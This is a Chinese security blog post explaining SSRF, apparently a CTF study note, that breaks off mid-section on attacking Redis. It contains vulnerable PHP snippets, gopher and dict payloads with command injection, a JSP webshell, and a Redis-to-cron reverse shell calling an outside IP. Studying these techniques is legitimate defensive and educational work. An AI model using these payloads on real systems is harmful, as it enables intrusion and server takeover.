<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="SSRF, Atmujie">
    <meta name="description" content="有一美人兮，见之不忘，一日不见兮，思之如狂；">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>SSRF | Atmujie</title>
    <link rel="icon" type="image/png" href="/weblogo.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Atmujie</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Atmujie</div>
        <div class="logo-desc">
            
            有一美人兮，见之不忘，一日不见兮，思之如狂；
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/12.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">SSRF</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">Web安全</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-09-22
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="SSRF概述"><a href="#SSRF概述" class="headerlink" title="SSRF概述"></a>SSRF概述</h1><p>SSRF服务器请求伪造</p>
<p>是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。</p>
<p>简单来说：</p>
<p>服务器或多或少都会开启不止一个端口，有些端口（比如80）是可以从外网访问到的，而有些端口只是开启在服务器内部以供服务器内部程序的交互，无法通过外网访问</p>
<p>而现在开放给外网的端口的程序大多都有完善的防御机制，攻击这些程序无法或者很难获取到有效的信息。</p>
<p>但内部的程序往往不会有太高的安全防护，并且保存着重要的信息（例如数据库——3306端口）</p>
<p>SSRF就是通过伪造信息使服务器（使用外网端口的程序）向内部系统（端口没有映射外网，只能服务器内部访问的程序）发起请求，从而得到内部系统的信息甚至控制服务器的攻击方式</p>
<p><img src="https://ca0y1h-bucket-1.oss-cn-hangzhou.aliyuncs.com/blog_img/20191206123722.png" alt="img"></p>
<h2 id="漏洞产生"><a href="#漏洞产生" class="headerlink" title="漏洞产生"></a>漏洞产生</h2><p>由于服务端提供了从其他服务器应用获取数据的功能且没有对用户可控的目标地址做过虑与限制。</p>
<p>在PHP中的curl()，file_get_contents()，fsockopen()等函数是几个主要产生ssrf漏洞的函数。</p>
<h3 id="file-get-contents"><a href="#file-get-contents" class="headerlink" title="file_get_contents()"></a>file_get_contents()</h3><p>file_get_contents是把文件写入字符串，当url是内网文件的时候，他会先去把这个文件的内容读出来再写入，导致了文件读取。</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">isset</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string">'url'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token comment" spellcheck="true">//POST传参接收</span>
<span class="token punctuation">{</span>
    <span class="token variable">$content</span><span class="token operator">=</span><span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string">'url'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 读取传参信息</span>
    <span class="token variable">$filename</span><span class="token operator">=</span><span class="token string">'./images/'</span><span class="token punctuation">.</span><span class="token function">rand</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token string">'.img'</span><span class="token punctuation">;</span>\ <span class="token comment" spellcheck="true">// 设定路径</span>
    <span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token variable">$filename</span><span class="token punctuation">,</span><span class="token variable">$content</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 保存</span>
    <span class="token keyword">echo</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string">'url'</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 输出传入的信息</span>
    <span class="token variable">$img</span><span class="token operator">=</span><span class="token string">"&lt;img src=\""</span><span class="token punctuation">.</span><span class="token variable">$filename</span><span class="token punctuation">.</span><span class="token string">"\"/>"</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 将传入文件以图片输出    </span>
<span class="token punctuation">}</span>
<span class="token keyword">echo</span> <span class="token variable">$img</span><span class="token punctuation">;</span>
<span class="token delimiter">?></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h3 id="fsockopen"><a href="#fsockopen" class="headerlink" title="fsockopen()"></a>fsockopen()</h3><p><code>fsockopen()</code>函数本身就是打开一个网络连接或者Unix套接字连接。</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token variable">$host</span><span class="token operator">=</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'url'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$fp</span> <span class="token operator">=</span> <span class="token function">fsockopen</span><span class="token punctuation">(</span><span class="token string">"$host"</span><span class="token punctuation">,</span> <span class="token number">80</span><span class="token punctuation">,</span> <span class="token variable">$errno</span><span class="token punctuation">,</span> <span class="token variable">$errstr</span><span class="token punctuation">,</span> <span class="token number">30</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment" spellcheck="true">/*
* fsockopen()函数用于连接一个网址，相当于java网络编程的内容
8 第一个参数代表一个主机的地址，第二个表示端口
* $errno和$errstr无需人为的去定义，这是php自带的两个参数，
* $errno 是从型参中传进来的
*/</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token variable">$fp</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token comment" spellcheck="true">// 如果打开失败，则返回错误信息</span>
    <span class="token keyword">echo</span> <span class="token string">"$errstr ($errno)&lt;br />\n"</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
    <span class="token comment" spellcheck="true">/*仿写一个HTTP请求头*/</span>
    <span class="token variable">$out</span> <span class="token operator">=</span> <span class="token string">"GET / HTTP/1.1\r\n"</span><span class="token punctuation">;</span>
    <span class="token variable">$out</span> <span class="token punctuation">.</span><span class="token operator">=</span> <span class="token string">"Host: $host\r\n"</span><span class="token punctuation">;</span>
    <span class="token variable">$out</span> <span class="token punctuation">.</span><span class="token operator">=</span> <span class="token string">"Connection: Close\r\n\r\n"</span><span class="token punctuation">;</span>
    <span class="token comment" spellcheck="true">//把仿写的GET请求发送至host</span>
    <span class="token function">fwrite</span><span class="token punctuation">(</span><span class="token variable">$fp</span><span class="token punctuation">,</span> <span class="token variable">$out</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token comment" spellcheck="true">//循环判断文件指针是否到了文件结束的位置</span>
    <span class="token keyword">while</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">feof</span><span class="token punctuation">(</span><span class="token variable">$fp</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token comment" spellcheck="true">/*读取一行数据
        *返回长度最多为 length - 1 字节的字符串。碰到换行符（包括在返回值中）、EOF 或者已经读取了 length - 1 字节后停止
        *（看先碰到那一种情况）。如果没有指定 length，则默认为 1K，或者说 1024 字节。
        */</span>
        <span class="token keyword">echo</span> <span class="token function">fgets</span><span class="token punctuation">(</span><span class="token variable">$fp</span><span class="token punctuation">,</span> <span class="token number">128</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 输出响应信息</span>
    <span class="token punctuation">}</span>
    <span class="token function">fclose</span><span class="token punctuation">(</span><span class="token variable">$fp</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token delimiter">?></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h3 id="curl"><a href="#curl" class="headerlink" title="curl()"></a>curl()</h3><p>这应该是大家最熟悉的一个函数了，因为利用方式很多最常见的是通过file、dict、gopher这三个协议来进行渗透，接下来也主要是集中讲对于<code>curl()</code>函数的利用方式。</p>
<blockquote>
<p>这里需要安装PHP的curl扩展 <a target="_blank" rel="noopener" href="https://segmentfault.com/a/1190000009068818">https://segmentfault.com/a/1190000009068818</a></p>
</blockquote>
<pre class="line-numbers language-php"><code class="language-php"><span class="token keyword">function</span> <span class="token function">curl</span><span class="token punctuation">(</span><span class="token variable">$url</span><span class="token punctuation">)</span><span class="token punctuation">{</span>  
    <span class="token comment" spellcheck="true">//初始化一个curl会话若传入参数，则可以手动的对url进行设置</span>
    <span class="token comment" spellcheck="true">/*curl_init(string $url);*/</span>
    <span class="token variable">$ch</span> <span class="token operator">=</span> <span class="token function">curl_init</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token comment" spellcheck="true">//设置curl传输选项curl_setopt();</span>
    <span class="token comment" spellcheck="true">/*curl_setopt($curl_init【由curl_init返回的句柄】,option[CURLOPT_XXX选项],value[设置在选项上的值]);*/</span>
    <span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_URL</span><span class="token punctuation">,</span> <span class="token variable">$url</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 设置url</span>
    <span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_HEADER</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 设置请求头</span>
    <span class="token function">curl_exec</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 执行会话</span>
    <span class="token function">curl_close</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 关闭</span>
<span class="token punctuation">}</span>

<span class="token variable">$url</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'url'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token function">curl</span><span class="token punctuation">(</span><span class="token variable">$url</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>下面就详细讲一下curl函数在ssrf中的具体利用方式。</p>
<h1 id="SSRF漏洞利用"><a href="#SSRF漏洞利用" class="headerlink" title="SSRF漏洞利用"></a>SSRF漏洞利用</h1><blockquote>
<p>在进行SSRF攻击时需要明确两点</p>
<p>1、SSRF可以做到多少事情和使用的协议有关</p>
<p>2、要知道可以使用那些协议，需要知道网站使用的语言支持那些协议，以及存在SSRF的函数支持那些协议</p>
</blockquote>
<h2 id="不同计算机语言支持的常用协议："><a href="#不同计算机语言支持的常用协议：" class="headerlink" title="不同计算机语言支持的常用协议："></a>不同计算机语言支持的常用协议：</h2><p><img src="20200201214217-16329099617601.png" alt="20200201214217"></p>
<h2 id="查看函数支持的所有协议"><a href="#查看函数支持的所有协议" class="headerlink" title="查看函数支持的所有协议"></a>查看函数支持的所有协议</h2><p><img src="image-20210929180818228.png" alt="image-20210929180818228"></p>
<p><strong>通过百度或者查看文档，可以知道函数支持的相关协议</strong></p>
<h3 id="gopher协议"><a href="#gopher协议" class="headerlink" title="gopher协议"></a>gopher协议</h3><p>互联网上使用的分布型的文件搜集获取网络协议，出现在http协议之前。（可以模拟GET/POST请求，换行使用%0d%0a，空白行%0a）。</p>
<p><strong>Gopher是Internet上一个非常有名的信息查找系统，它将Internet上的文件组织成某种索引，很方便地将用户从Internet的一处带到另一处。在WWW出现之前，Gopher是Internet上最主要的信息检索工具，Gopher站点也是最主要的站点，使用tcp70端口。</strong></p>
<p>简单说该协议作用和语法与http一致，传输的格式略有不同</p>
<blockquote>
<p>语法：</p>
<pre class="line-numbers language-gophar"><code class="language-gophar">gopher://<host>:<port>/<gopher-path>_后接TCP数据流
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</blockquote>
<pre class="line-numbers language-curl"><code class="language-curl">curl gopher://localhost:2222/_hello%0agopher
//在数据hello前要加一个无用字符
http://192.168.91.130/ssrf.php?url=gopher://localhost:2222/_hello%250agopher
//在地址栏使用时要url编码
http://192.168.91.130/ssrf.php?url=gopher://localhost:2222/_`whoami`
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>利用gopher协议可以攻击内网的 FTP、Telnet、Redis、Memcache，也可以进行 GET、POST 请求。</strong></p>
<p><img src="image-20211022123436051.png" alt="image-20211022123436051"></p>
<p><img src="image-20211022123450214.png" alt="image-20211022123450214"></p>
<h4 id="gopher协议内部rce"><a href="#gopher协议内部rce" class="headerlink" title="gopher协议内部rce"></a>gopher协议内部rce</h4><pre class="line-numbers language-gopher"><code class="language-gopher">http://192.168.91.130/ssrf.php?url=gopher://localhost:2222/_`whoami`
//只有自身服务器监听端口时可以实现任意命令执行
//但可以自定义命令，比如可以将执行的命令写入文件，然后进行读取，这样就可以造成rce
curl gopher://localhost:80/_`cat * > 4.txt`
//这种情况也不需要刻意的去监控端口，只需要选一个存在的端口发送即可
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="gopher协议攻击mysql"><a href="#gopher协议攻击mysql" class="headerlink" title="gopher协议攻击mysql"></a>gopher协议攻击mysql</h4><p>一般情况下，mysql都是运行在本地服务器的3306端口下，普通的方法无法防问，但SSRF可以</p>
<p>MySQL客户端连接并登录服务器时存在两种情况：需要密码认证以及无需密码认证。</p>
<ul>
<li>当需要密码认证时使用挑战应答模式，服务器先发送salt然后客户端使用salt加密密码然后验证</li>
<li>当无需密码认证时直接发送TCP/IP数据包即可</li>
</ul>
<p>MySQL客户端与服务器的交互主要分为两个阶段：连接阶段或者叫认证阶段和命令阶段。在连接阶段包括握手包和认证包，我们主要关注认证数据包。</p>
<p>认证包格式：<br><img src="20191112131647463.png" alt="img"></p>
<blockquote>
<p><strong>攻击原理：</strong></p>
<p>gopher协议可以后接一个TCP数据流</p>
<p>mysql会通过TCP/IP套接字连接</p>
<p>所以我们可以自已建立一个和目标大致相仿的数据库，抓取mysql数据包，然后通过gopher协议将伪造的认证包和请求包发送3306端口，即可完成对mysql的攻击</p>
</blockquote>
<p>详见：</p>
<p><code>https://blog.csdn.net/qq_41107295/article/details/103026470</code></p>
<p>``<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/159342.html%60">https://www.freebuf.com/articles/web/159342.html`</a></p>
<h4 id="gopher攻击Fastcgi"><a href="#gopher攻击Fastcgi" class="headerlink" title="gopher攻击Fastcgi"></a>gopher攻击Fastcgi</h4><p>详见：</p>
<p><code>https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html</code></p>
<p><code>https://www.jianshu.com/p/565217337247</code></p>
<p>Fastcgi其实是一个通信协议，和HTTP协议一样，都是进行数据交换的一个通道。</p>
<p>HTTP协议是浏览器和服务器中间件进行数据交换的协议，浏览器将HTTP头和HTTP体用某个规则组装成数据包，以TCP的方式发送到服务器中间件，服务器中间件按照规则将数据包解码，并按要求拿到用户需要的数据，再以HTTP协议的规则打包返回给服务器。</p>
<p>类比HTTP协议来说，fastcgi协议则是服务器中间件和某个语言后端进行数据交换的协议。Fastcgi协议由多个record组成，record也有header和body一说，服务器中间件将这二者按照fastcgi的规则封装好发送给语言后端，语言后端解码以后拿到具体数据，进行指定操作，并将结果再按照该协议封装好后返回给服务器中间件。</p>
<p>CGI全称”通用网关接口”（Common Gateway Interface），用于HTTP服务器与其它机器上的程序服务通信交流的一种工具，CGI程序须运行在网络服务器上。</p>
<p>传统CGI接口方式的主要缺点是性能较差，因为每次HTTP服务器遇到动态程序时都需要重启解析器来执行解析，然后结果被返回给HTTP服务器。这在处理高并发访问几乎是不可用的，因此就诞生了FastCGI。另外传统的CGI接口方式安全性也很差。</p>
<p>FastCGI是一个可伸缩地、高速地在HTTP服务器和动态脚本语言间通信的接口（FastCGI接口在Linux下是socket（可以是文件socket，也可以是ip socket）），主要优点是把动态语言和HTTP服务器分离开来。</p>
<blockquote>
<p>HTTP协议是浏览器和服务器中间件通信的协议，而Fastcgi是服务器中间件和语言后端通信的协议</p>
<p>这是因为中间件（HTTP服务器）不能动态的解析程序，所以需要Fastcgi来解析动态语言后，再交由http解析</p>
</blockquote>
<p>FastCGI的重要特点：</p>
<ul>
<li>1、FastCGI是HTTP服务器和动态脚本语言间通信的接口或者工具。</li>
<li>2、FastCGI优点是把动态语言解析和HTTP服务器分离开来。</li>
<li>3、Nginx、Apache、Lighttpd以及多数动态语言都支持FastCGI。</li>
<li>4、FastCGI接口方式采用C/S架构，分为客户端（HTTP服务器）和服务端（动态语言解析服务器）。</li>
<li>5、PHP动态语言服务端可以启动多个FastCGI的守护进程。</li>
<li>6、HTTP服务器通过FastCGI客户端和动态语言FastCGI服务端通信。</li>
</ul>
<blockquote>
<p>攻击要点</p>
<ul>
<li>libcurl版本&gt;=7.45.0(由于EXP里有%00，CURL版本小于7.45.0的版本，gopher的%00会被截断)</li>
<li>PHP-FPM监听端口</li>
<li>PHP-FPM版本 &gt;= 5.3.3</li>
<li>知道服务器上任意一个php文件的绝对路径</li>
</ul>
</blockquote>
<h3 id="dict协议"><a href="#dict协议" class="headerlink" title="dict协议"></a>dict协议</h3><p>字典服务器协议。dict是基于查询相应的TCP协议。Dict服务器和客户机使用TCP端口2628，允许客户端在使用过程中访问更多字典。。漏洞代码没有屏蔽回显的情况下，可以利用dict协议获取ssh等服务版本信息。</p>
<p>在SSRF攻击中，gopher协议是最好用的，但gopher协议又自己的使用条件</p>
<p><img src="1937992-20200527101703916-1706063347.png" alt="img"></p>
<p><strong>利用dict协议可以探测端口的开放情况和指纹信息</strong></p>
<p>dict协议语法：</p>
<pre class="line-numbers language-dict"><code class="language-dict">dict://serverip:port/命令:参数
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>payload示例：</p>
<pre class="line-numbers language-payload"><code class="language-payload">curl -v http://localhost/ssrf/ssrf.php?url=dict://127.0.0.1:6379/info
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>如果ssrf.php中加上一行屏蔽回显的代码<code>curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);</code>，那么这种方式就失效了，和gopher一样，只能利用nc监听端口，反弹传输数据了。</p>
<blockquote>
<p>注意：dict协议后跟的命令可以直接被某些服务执行，比如redis</p>
</blockquote>
<h3 id="file协议"><a href="#file协议" class="headerlink" title="file协议"></a>file协议</h3><p>本地文件传输协议，主要用于访问本地计算机中的文件。</p>
<p>因为SSRF攻击的本质就是从外网攻击内网，所以只要函数支持file协议，那么file协议就可以读到文件</p>
<p><img src="image-20211001115341285.png" alt="image-20211001115341285"></p>
<h3 id="http-s"><a href="#http-s" class="headerlink" title="http/s"></a>http/s</h3><p>主要用来探测内网服务。根据响应的状态判断内网端口及服务，可以结合java系列0day和其他各种0day使用。</p>
<p>这个协议不做细说</p>
<p><strong>反弹shell部分我写在了<code>https://atmujie.github.io/2021/10/21/%E5%8F%8D%E5%BC%B9shell/</code></strong></p>
<h1 id="打穿内网（理一下SSRF的攻击思路）"><a href="#打穿内网（理一下SSRF的攻击思路）" class="headerlink" title="打穿内网（理一下SSRF的攻击思路）"></a>打穿内网（理一下SSRF的攻击思路）</h1><p>参考<code>https://www.sqlsec.com/2021/05/ssrf.html</code></p>
<p>没靶场，摘一下参考文章的说明，具体内容看参考文章</p>
<p><img src="16205694239190.png" alt="img"></p>
<p><strong>172.72.23.21 这个服务器的 Web 80 端口存在 SSRF 漏洞，并且 80 端口映射到了公网的 8080，此时攻击者通过这个 8080 端口可以借助 SSRF 漏洞发起对 172 目标内网的探测和攻击。</strong></p>
<p>我这里以极客大挑战givemeyourlove为例</p>
<h2 id="SSRF的判断"><a href="#SSRF的判断" class="headerlink" title="SSRF的判断"></a>SSRF的判断</h2><p><strong>能够对外发起网络请求的地方，就可能存在 SSRF。</strong></p>
<p><strong>只要可以获取到内网文件，就一定存在SSRF</strong></p>
<p>例如极客大挑战givemeyourlove</p>
<p><img src="image-20211021215000591.png" alt="image-20211021215000591"></p>
<h2 id="读取本地信息"><a href="#读取本地信息" class="headerlink" title="读取本地信息"></a>读取本地信息</h2><p>判断SSRF存在后，接下来就是读取本地的信息进一步判断</p>
<p>/etc/passwd: 查看是否对内网文件有读取权限</p>
<p>/etc/hosts: 查看存活主机（内网主机），确认当前资产的网段信息</p>
<h2 id="探测内网端口"><a href="#探测内网端口" class="headerlink" title="探测内网端口"></a>探测内网端口</h2><p>探测内网端口主要方法</p>
<ul>
<li><p>nmap扫描：知道内网存活主机ip的情况下，可以使用nmap扫描内网端口</p>
<p>  参考链接<code>https://blog.51cto.com/lee90/1858381</code></p>
</li>
<li><p>dict协议探测：SSRF常配合DICT协议探测内网端口，但不是所有的端口都可以被探测，一般只能探测出一些带 TCP 回显的端口</p>
</li>
<li><p>BP 下使用迭代器模式爆破，设置好要爆破的 IP 和 端口即可批量探测出端口开放的信息</p>
</li>
</ul>
<h2 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h2><p>在得知存活主机的端口后，就可以对其进行目录扫描，寻找可以攻击的漏洞点</p>
<p><img src="image-20211022123037938.png" alt="image-20211022123037938"></p>
<p>然后在攻击点执行getshell等一系列的攻击操作</p>
<h2 id="写入shell，getshell"><a href="#写入shell，getshell" class="headerlink" title="写入shell，getshell"></a>写入shell，getshell</h2><p>无论怎么进行SSRF攻击内网，最后的一步操作大多是写入shell控制对方内网主机</p>
<p>就拿参考文章的例子来说</p>
<pre class="line-numbers language-jsp"><code class="language-jsp"><%
    String command = request.getParameter("cmd");
    if(command != null)
    {
        java.io.InputStream in=Runtime.getRuntime().exec(command).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1)
        {
            out.println(new String(b));
        }
        out.print("</pre>");
    } else {
        out.print("format: xxx.jsp?cmd=Command");
    }
%>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>这个一个jsp的小马</p>
<p><a target="_blank" rel="noopener" href="https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615/README.zh-cn.md">Tomcat PUT方法任意写文件漏洞（CVE-2017-12615）</a></p>
<p>将小马通过这个漏洞写入被攻击方服务器，然后执行，就是一个写入getshell的过程</p>
<pre class="line-numbers language-bash"><code class="language-bash">auth 123123

flushall

config <span class="token keyword">set</span> <span class="token function">dir</span> /var/spool/cron/

config <span class="token keyword">set</span> dbfilename root

<span class="token keyword">set</span> x <span class="token string">"\n* * * * * /bin/bash -i >&amp; /dev/tcp/1.15.225.114/2333 0>&amp;1\n"</span>

save
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h1 id="SSRF攻击redis"><a href="#SSRF攻击redis" class="headerlink" title="SSRF攻击redis"></a>SSRF攻击redis</h1><blockquote>
<p>SSRF攻击redis有两种类型</p>
<p>1、无需密码（未授权攻击）</p>
<p>2、需要密码</p>
</blockquote>
<h2 id="构造数据包攻击"><a href="#构造数据包攻击" class="headerlink" title="构造数据包攻击"></a>构造数据包攻击</h2><p>无论需不需要密码，都可以构建数据包进行攻击，这也是所有基于gopher协议的SSRF攻击通用的一点</p>
<p>流程：</p>
<p>1、先写一个.sh脚本，执行redis命令反弹shell</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true">#shell.sh</span>
